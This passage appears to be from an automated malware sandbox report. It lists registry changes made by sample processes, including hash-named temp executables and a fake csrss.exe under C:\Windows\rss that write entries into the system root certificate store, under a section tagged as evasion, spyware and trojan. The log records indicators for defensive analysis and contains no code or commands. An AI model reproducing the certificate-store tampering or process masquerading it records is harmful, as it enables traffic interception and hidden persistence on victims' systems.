Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "403735099" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{89C0E4E1-67AC-11EE-A354-7AA063A69366} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30529061b9fbd901 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{89D222F1-67AC-11EE-A354-7AA063A69366} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
